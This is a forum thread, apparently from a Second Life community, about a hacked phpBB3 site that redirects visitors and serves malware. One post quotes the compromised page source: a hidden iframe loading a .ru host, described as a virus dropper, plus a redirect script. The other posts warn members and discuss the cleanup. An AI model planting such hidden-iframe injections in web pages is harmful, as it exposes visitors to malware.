Nexii's Forum Comprimised?

[Jester Spearmann]

This was sent to me by tuomy

[4:16] Tuomy Boa: who has access to ordoimperialis.com?

[4:17] Jester Spearmann: uhhh everyone o.o it's a public website ;p

[4:17] Jester Spearmann: why

[4:17] Tuomy Boa: i mean who could make the domain reroute to vanguards homesite? try nexii.ordoimperialis.com

[4:17] Jester Spearmann: o.O

[4:18] Jester Spearmann: it was hacked by russians apparantly

[4:18] Jester Spearmann: scan your system, NOW

[4:18] Jester Spearmann: it's a virus dropper

[4:18] Tuomy Boa: Nopes, its not by Russians this time

[4:18] Jester Spearmann: FFFF

[4:19] Tuomy Boa: Someone with access to domain made the domain reroute all people to Vanguards forums

[4:20] Tuomy Boa: the russians thing happened few weeks ago

[4:22] Jester Spearmann: mind if i copypaste this to the forum as a warning /

[4:22] Jester Spearmann: ? *

[4:24] Tuomy Boa: go ahead

[4:25] Tuomy Boa: id try contact whoever owns ordoimperialis.com and tell them to change the passes

[4:25] Jester Spearmann: Thanks, intus has been informed

I checked and the page tries to download a virus to your system

[4:22] Vinnie Lei (COM): Page source; <html>

<body><iframe src=&quot;http://q5x.ru:8080/index.php" width=111 height=137 style="visibility: hidden"></iframe>

<script type="text/javascript"><!--

setTimeout('Redirect()',1);

function Redirect()

{

location.href = 'http://www DOT vanguardarmedforces DOT com/forums/index DOT php';

}

// --></script>

</body

Yes I deliberately broke the coding so as not to actually make it a full html setup in the quote

The iframe is the worm dropper, see attached screenshot

[Trevor Russell]

Most disturbing, investigating.

[ribena Homewood]

Jester: Eats viruses for the better goods!

Yeah, it's VG now.

I nearly got a virus from it too.

[Trevor Russell]

My FTP password is failing D:

For now, AVOID THE SITE.

[Jester Spearmann]

Rei posted a note in the officer group to pass on the message

[Zerowinged Vasiliev]

Nexii: "Coder Jesus"

VG: Dumbasses that attacked "Coder Jesus"

Equals?: Nexii Reagefacing.

This should be entertaining. . .

[Inoue Katsu]

Imo Intus should talk to the webhost about this.

[Cygna]

I made nexii.ordoimperialis.com redirect to Vanguard's website a few days ago because I thought it was them that hacked it (would have been extremely funny to see them hack themselves lol). Turns out Nexii's website was not hacked by Vanguard, but infact hacked by a random unaffiliated to SL hacking group. I fixed Nexii's website, and it was hacked again by that hacking group. I fixed it a third time, then it was again hacked last night by the hacking group. That line is the virus dropper, they do it to all the PHPBB3 forums they hack. I removed the line.

The random hacking group continue to hack his website, they know when I change it. They will probably do it again. If you're using firefox 3.0, you'll be fine and won't get a virus, it automatically blocks the virus dropper. Most other browsers warn you, as long as you say "NO" and not "YES" you won't get a virus (lol).

Safest thing is to not go to nexii.ordoimperialis.com until I get the directory deleted.

[Cygna]

My FTP password is failing D:

For now, AVOID THE SITE.

IM'd you your pass

[Cygna]

Update:

nexii.ordoimperialis.com was taken offline. I'm beginning to think it damned well could have been Vanguard that hacked it. Oh well, there's no way we'll ever know. Thread open for discussion.

And also, to clarify for the future, posting HTML is fine; it will do nothing (I disabled it)

[Inoue Katsu]

firefox with noscript ftw.

Was it the software Nexii used that was exploitable or whatever webhost he has it on ?

[Kytec Switchblade]

I'm pretty sure VG has enough despicable characters that would have the resources to hack a site thru a .ru proxy, definitely a possibility.

[Cygna]

Was it the software Nexii used that was exploitable or whatever webhost he has it on ?

Software: PHPBB3

[Vinnie Lei]

Mmmm, any specifics on what the malware tries to do with the system? To be sure anyhow I scanned my sytem.. but no results (luckily? :P).

Still, sad that some have the need to do stuff like that *shrug*

[Cyphre Iredell]

Worm is a worm, its more an issue of how that thing got there in the first place. Any way to tell the IP of the one who modified it last to see?

Also, how do you get noscript to work in Firefox anyway?

[Cygna]

Worm is a worm, its more an issue of how that thing got there in the first place. Any way to tell the IP of the one who modified it last to see?

Also, how do you get noscript to work in Firefox anyway?

A team or individual modified the output PHP script of index.php to, rather than show the forum listing as normal, to instead do an <iframe> with a website which attempts to inject the malicious software. It's technically not "there", it's just indirectly "there".